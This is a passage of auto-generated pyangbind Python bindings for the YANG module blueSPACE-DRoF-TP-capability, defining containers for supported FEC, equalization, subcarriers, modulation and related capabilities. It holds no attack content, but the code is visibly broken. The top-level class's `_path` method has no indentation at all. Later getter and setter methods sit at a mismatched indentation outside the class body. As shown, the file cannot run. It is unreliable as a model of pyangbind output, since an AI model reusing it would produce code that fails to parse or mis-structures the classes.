        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__fec_id = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_fec_id(self):
    # Reset the key leaf to a fresh, unset YANGDynClass instance.
    self.__fec_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  def _get_fec_type(self):
    """
    Getter method for fec_type, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_type (identityref)
    """
    return self.__fec_type
  def _set_fec_type(self, v, load=False):
    """
    Setter method for fec_type, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_type (identityref)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_fec_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_fec_type() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Identityref values are validated against the restricted key set above.
      t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
        'error-string': """fec_type must be of a type compatible with identityref""",
        'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
        'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
      })
    self.__fec_type = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_fec_type(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__fec_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
  # Read-only properties (leaves are config false) and the ordered element
  # registry consumed by PybindBase.
  fec_id = __builtin__.property(_get_fec_id)
  fec_type = __builtin__.property(_get_fec_type)
  _pyangbind_elements = OrderedDict([('fec_id', fec_id), ('fec_type', fec_type), ])
class yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-equalization. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # __slots__ keeps per-instance memory low; the double-underscore entries are
  # the name-mangled private stores for the two YANG leaves of this list entry.
  __slots__ = ('_path_helper', '_extmethods', '__equalization_id','__equalization_type',)
  _yang_name = 'supportable-equalization'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    self._path_helper = False
    self._extmethods = False
    # equalization-type is an identityref restricted to the ZF / MMSE
    # identities (accepted both with and without the module prefix).
    self.__equalization_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    # equalization-id is the list key (is_keyval=True); both leaves are
    # operational state (is_config=False).
    self.__equalization_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    load = kwargs.pop("load", None)
    # Copy-constructor support: a single positional argument must expose every
    # element of this container; changed elements are copied via the setters.
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    # Absolute YANG path: parent path plus this node's name, or the
    # schema-rooted default when detached.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['DRoF-TP-capability', 'supportable-equalization']
  def _get_equalization_id(self):
    """
    Getter method for equalization_id, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_id (string)
    """
    return self.__equalization_id
  def _set_equalization_id(self, v, load=False):
    """
    Setter method for equalization_id, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_equalization_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_equalization_id() directly.
    """
    # List keys may not be rewritten once the entry is part of a list, except
    # during a load (deserialization) pass.
    parent = getattr(self, "_parent", None)
    if parent is not None and load is False:
      raise AttributeError("Cannot set keys directly when" +
        " within an instantiated list")
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
        'error-string': """equalization_id must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__equalization_id = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_equalization_id(self):
    # Reset the key leaf to a fresh, unset YANGDynClass instance.
    self.__equalization_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  def _get_equalization_type(self):
    """
    Getter method for equalization_type, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_type (identityref)
    """
    return self.__equalization_type
  def _set_equalization_type(self, v, load=False):
    """
    Setter method for equalization_type, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_type (identityref)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_equalization_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_equalization_type() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Identityref values are validated against the restricted key set above.
      t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
        'error-string': """equalization_type must be of a type compatible with identityref""",
        'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
        'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
      })
    self.__equalization_type = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_equalization_type(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__equalization_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
  # Read-only properties (leaves are config false) and the ordered element
  # registry consumed by PybindBase.
  equalization_id = __builtin__.property(_get_equalization_id)
  equalization_type = __builtin__.property(_get_equalization_type)
  _pyangbind_elements = OrderedDict([('equalization_id', equalization_id), ('equalization_type', equalization_type), ])
class yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # Slots for the eight child elements of the top-level DRoF-TP-capability
  # container (name-mangled private stores populated in __init__).
  __slots__ = ('_path_helper', '_extmethods', '__supportable_capacity','__supportable_modulation','__supportable_subcarriers','__supportable_constellation','__supportable_nominal_central_frequency_range','__supportable_bandwidth','__supportable_FEC','__supportable_equalization',)
  _yang_name = 'DRoF-TP-capability'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    self._path_helper = False
    self._extmethods = False
    # Leaf elements of the capability container (all operational state).
    self.__supportable_modulation = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    # leaf-list of uint32 subcarrier counts; unique=True enforces no duplicates.
    self.__supportable_subcarriers = YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
    # Keyed YANG lists, bound to their per-entry classes defined above.
    self.__supportable_FEC = YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
    self.__supportable_constellation = YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
    # Child containers, bound to their container classes defined above.
    self.__supportable_capacity = YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
    self.__supportable_bandwidth = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    self.__supportable_nominal_central_frequency_range = YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
    self.__supportable_equalization = YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
    load = kwargs.pop("load", None)
    # Copy-constructor support: a single positional argument must expose every
    # element of this container; changed elements are copied via the setters.
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability']
  def _get_supportable_capacity(self):
    """
    Getter method for supportable_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity (container)
    """
    # Returns the YANGDynClass-wrapped child container (read-only property below).
    return self.__supportable_capacity
  def _set_supportable_capacity(self, v, load=False):
    """
    Setter method for supportable_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_supportable_capacity is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_supportable_capacity() directly.
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; an incompatible value raises below.
      t = YANGDynClass(v,base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """supportable_capacity must be of a type compatible with container""",
        'defined-type': "container",
        'generated-type': """YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)""",
      })
    self.__supportable_capacity = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_supportable_capacity(self):
    # Reset the container to a fresh, unset YANGDynClass instance.
    self.__supportable_capacity = YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
  def _get_supportable_modulation(self):
    """
    Getter method for supportable_modulation, mapped from YANG variable /DRoF_TP_capability/supportable_modulation (string)
    YANG Description: e.g. OFDM
    """
    # Returns the YANGDynClass-wrapped string leaf (read-only property below).
    return self.__supportable_modulation
  def _set_supportable_modulation(self, v, load=False):
    """
    Setter method for supportable_modulation, mapped from YANG variable /DRoF_TP_capability/supportable_modulation (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_supportable_modulation is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_supportable_modulation() directly.
    YANG Description: e.g. OFDM
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; a type-incompatible value raises below.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """supportable_modulation must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__supportable_modulation = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_supportable_modulation(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__supportable_modulation = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_supportable_subcarriers(self):
  """
  Getter method for supportable_subcarriers, mapped from YANG variable /DRoF_TP_capability/supportable_subcarriers (uint32)
  """
  return self.__supportable_subcarriers

def _set_supportable_subcarriers(self, v, load=False):
  """
  Setter method for supportable_subcarriers, mapped from YANG variable /DRoF_TP_capability/supportable_subcarriers (uint32)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_subcarriers is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_subcarriers() directly.
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # leaf-list of uint32: unique=True enforces YANG leaf-list uniqueness,
    # and the restricted class bounds each entry to the uint32 range.
    t = YANGDynClass(v,unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_subcarriers must be of a type compatible with uint32""",
      'defined-type': "uint32",
      'generated-type': """YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
    })
  self.__supportable_subcarriers = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_subcarriers(self):
  # Reset the leaf-list to a fresh default (unset) instance.
  self.__supportable_subcarriers = YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
def _get_supportable_constellation(self):
  """
  Getter method for supportable_constellation, mapped from YANG variable /DRoF_TP_capability/supportable_constellation (list)
  """
  return self.__supportable_constellation

def _set_supportable_constellation(self, v, load=False):
  """
  Setter method for supportable_constellation, mapped from YANG variable /DRoF_TP_capability/supportable_constellation (list)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_constellation is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_constellation() directly.
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # YANG list keyed on 'constellation-id'; entries are the generated
    # container class for /DRoF_TP_capability/supportable_constellation.
    t = YANGDynClass(v,base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_constellation must be of a type compatible with list""",
      'defined-type': "list",
      'generated-type': """YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
    })
  self.__supportable_constellation = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_constellation(self):
  # Reset the list to a fresh default (unset) instance.
  self.__supportable_constellation = YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
def _get_supportable_nominal_central_frequency_range(self):
  """
  Getter method for supportable_nominal_central_frequency_range, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range (container)
  """
  return self.__supportable_nominal_central_frequency_range

def _set_supportable_nominal_central_frequency_range(self, v, load=False):
  """
  Setter method for supportable_nominal_central_frequency_range, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range (container)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_nominal_central_frequency_range is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_nominal_central_frequency_range() directly.
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # Container node backed by its generated pyangbind class.
    t = YANGDynClass(v,base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_nominal_central_frequency_range must be of a type compatible with container""",
      'defined-type': "container",
      'generated-type': """YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)""",
    })
  self.__supportable_nominal_central_frequency_range = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_nominal_central_frequency_range(self):
  # Reset the container to a fresh default (unset) instance.
